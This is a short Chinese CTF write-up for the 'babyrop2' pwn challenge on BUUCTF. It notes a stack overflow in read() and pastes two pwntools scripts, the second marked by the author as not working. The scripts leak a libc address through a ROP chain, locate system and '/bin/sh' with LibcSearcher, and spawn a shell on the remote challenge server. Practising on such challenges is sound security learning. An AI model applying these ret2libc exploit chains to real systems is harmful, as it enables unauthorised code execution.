又是babyrop这类题目,确实这类题目有个特点,他喜欢藏flag喜欢放在home里面
    image.png
    64位文件,buf很明显存在漏洞
    这里有一点说一下
    v3 = read(0,buf,0x100ull)
    这里v3等于啥呢,等于buf输入长度加一,最高是第三个参数的值,这里什么意思呢就是buf末尾是\x00
    这类题目太多了
    直接贴了嘿嘿,我遇到了和学长一样的问题,用printf来泄露竟然接受都接受不了,哎,反正就这样吧,以后再说了,抄了份wp

    1. from LibcSearcher import LibcSearcher
    2. from pwn import *
    4. context.log_level = 'debug'
    6. # io = process("./baby_rop2")
    7. io = remote("node4.buuoj.cn",27505)
    8. elf = ELF("./babyrop2")
    10. printf_plt = elf.plt["printf"]
    11. printf_got = elf.got["printf"]
    12. read_got = elf.got["read"]
    13. main_plt = elf.symbols["main"]
    14. pop_rdi_ret = 0x0400733
    15. pop_rsi_r15_ret = 0x0400731
    16. str_addr = 0x0000400770
    19. payload1 = b"A"*(0x20+8) 
    20. payload1 += p64(pop_rdi_ret) + p64(str_addr)
    21. payload1 += p64(pop_rsi_r15_ret) + p64(read_got) + p64(0x1)
    22. payload1 += p64(printf_plt) + p64(main_plt)
    25. io.recvuntil("What's your name? ")
    26. io.sendline(payload1)
    28. # io.recvline()
    29. # io.recvuntil("again, ")
    30. # printf_addr = io.recvuntil("!\n",True)
    31. # print(printf_addr)
    32. # printf_addr = u64(printf_addr.ljust(8,"\x00"))
    34. # io.recvline()
    35. # pause()
    38. read_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    40. print(read_addr)
    42. libc = LibcSearcher('read', read_addr)
    43. libcbase = read_addr - libc.dump('read')
    44. system_addr = libcbase + libc.dump('system')
    45. binsh_addr = libcbase + libc.dump('str_bin_sh')
    46. print(system_addr)
    47. print(binsh_addr)
    49. payload2 = b"A"*(0x20+8) 
    50. payload2 += p64(pop_rdi_ret) + p64(binsh_addr) + p64(system_addr) + p64(0)
    52. io.recvuntil("What's your name? ")
    53. io.sendline(payload2)
    55. io.interactive()

    出错wp,printf用rop传参也一样出现问题。

    1. from pwn import *
    2. from LibcSearcher import* 
    3. context(log_level = 'debug')
    5. #io = process("babyrop2")
    6. io = remote("node4.buuoj.cn",27505)
    7. #context.arch = "amd64"
    8. elf = ELF('babyrop2')
    9. offest = 0x28
    10. printf_got = elf.got['printf']
    11. printf_plt = elf.plt['printf']
    12. main_addr = elf.sym['main']
    13. libc_start = 0x0000000000400710
    14. libc_end = 0x000000000040072A
    15. pop_rdi_addr =0x0000000000400733
    16. io.recvuntil("What's your name? ")
    17. payload = b'a'*offest + p64(pop_rdi_addr)+p64(printf_got)+p64(printf_plt)+ p64(main_addr)
    18. io.sendline(payload)
    20. printf_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
    21. log.success('printf_addr ==>'+hex(printf_addr))
    22. libc = LibcSearcher("printf",printf_addr)
    23. libcbase =printf_addr - libc.dump('printf')
    24. system_addr =libcbase +libc.dump('system')
    25. bin_sh_addr =libcbase + libc.dump("str_bin_sh")
    27. payload1 = b'a' *offest +p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)+b'a'*8
    28. io.sendline(payload1)
    29. io.interactive()